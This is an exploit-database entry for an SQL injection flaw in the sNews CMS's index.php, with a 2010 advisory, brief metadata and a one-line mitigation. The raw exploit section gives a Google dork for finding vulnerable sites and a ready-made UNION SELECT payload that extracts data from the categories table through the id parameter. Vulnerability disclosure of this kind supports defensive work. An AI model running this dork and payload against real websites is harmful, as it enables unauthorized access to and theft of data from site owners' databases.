sNews (index.php) SQL Injection Vulnerability

vendor:

sNews

by:

MajoR

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: sNews

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: a:snews:snews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2010

sNews (index.php) SQL Injection Vulnerability

sNews is vulnerable to a SQL injection vulnerability in the index.php file. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request contains a specially crafted SQL query that can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title:sNews (index.php) SQL Injection Vulnerability

# Date: 2010-07-24

# Author: MajoR

# Software Link: http://snews.awddesign.co.uk

# Version: N/A

# Tested on: Wnidows xp SP2

# CVE : N/A



====================================================sNews (index.php) SQL Injection Vulnerability
===================================================

Author :   MajoR
Email  : Ma-j-oR@hotmail.fr

DORK    :  "Powered by sNews " inurl:index.php?id=

===================================================


[+] Vulnerable File : 

http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :


-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

====================================================


Greetingz To SlaSSi & Xella